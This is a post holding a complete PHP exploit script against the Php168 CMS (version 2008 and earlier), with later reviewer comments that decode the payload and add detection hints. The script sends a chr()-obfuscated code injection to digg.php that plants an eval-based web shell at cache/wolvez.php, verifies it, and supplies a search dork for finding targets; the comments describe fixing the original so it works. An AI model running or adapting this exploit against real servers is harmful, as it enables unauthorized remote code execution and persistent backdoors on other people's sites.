Php168一个很早的漏洞的EXP
作者:puret_t
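利用代码:
<?php
/*
 * Php168 <= v2008 remote code execution exploit (puret_t, 2008).
 *
 * Reviewer notes (this page only shows the client side; digg.php itself is
 * not visible here, so the exact server-side sink is NOT confirmed):
 *
 *  - The POST body sets makehtml=1 and puts a PHP "${${...}}" expression into
 *    chdb[htmlname]. Presumably the target interpolates that value into a
 *    double-quoted string (or otherwise evaluates it) while "making HTML";
 *    the ${...} syntax only fires in such a context.
 *  - Decoded, the chr() runs in the payload spell:
 *        fopen('cache/wolvez.php', 'w+')
 *        '<?eval($_POST[c])?>puret_t'
 *    i.e. on success the target writes cache/wolvez.php containing an
 *    eval()-based backdoor followed by the literal marker string "puret_t".
 *  - Success is detected by fetching cache/wolvez.php: the eval of an empty
 *    $_POST[c] does nothing and the page body is exactly "puret_t".
 *
 * Detection / response hints grounded in the above:
 *    POST .../digg.php (author also lists login.php, search.php, sendpwd.php,
 *    showsp.php as alternative entry points) with "chdb[htmlname]=${${" in
 *    the body, and any newly written file under cache/ (here wolvez.php).
 *
 * Fixes versus the original listing:
 *  - The success check referenced an undefined $url (file_get_contents('')
 *    only produced a warning and was always treated as "ok"); dropped.
 *  - fsockopen() result is checked and the socket is closed.
 *  - Extraction artefacts (HTML anchors inside the banner and the Referer
 *    header) restored to plain text.
 */
print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to php168
Example: php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

// $path is used verbatim as a URL prefix and must end in '/' (see the usage
// example): the request line and $shell simply append to it.
$host = $argv[1];
$path = $argv[2];

// Payload: chdb[htmlname] carries a ${${...}} expression built entirely from
// chr() calls so that no quotes or slashes appear in the POST body.
// Decoded: fputs(fopen('cache/wolvez.php','w+'), '<?eval($_POST[c])?>puret_t')
$cmd = 'makehtml=1&chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}';
$shell = 'http://'.$host.$path.'cache/wolvez.php';

/**
 * wolvez.php has this code:
 * <?eval($_POST[c])?>
 * followed by the marker "puret_t", which is what the check below looks for.
 */
send($cmd);

// The original condition was `!file_get_contents($url) && ...` with $url never
// assigned; that half only emitted a warning, so the real test is the marker.
// '@' suppresses the connection warning when the file does not exist.
$body = @file_get_contents($shell);
if ($body !== false && $body === 'puret_t')
    exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
    exit("Exploit Failed!\n");

/**
 * Send $cmd as a raw HTTP/1.1 POST to $path.'digg.php' on $host, port 80.
 *
 * @param string $cmd  urlencoded POST body (sent as-is; length taken with strlen)
 * @return string      raw response (status line + headers + body), or '' if the
 *                     TCP connection could not be opened
 *
 * Reads $host and $path from the global scope (script-level variables above).
 * The author's alternative entry points, kept here for reference instead of
 * as commented-out code: login.php, search.php, sendpwd.php, showsp.php.
 */
function send($cmd) {
    global $host, $path;

    $message  = "POST ".$path."digg.php HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;

    // Port 80 is hard-coded (plain HTTP only), exactly as in the original.
    $fp = @fsockopen($host, 80);
    if (!$fp) {
        return '';
    }
    fputs($fp, $message);

    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);
    return $resp;
}
?>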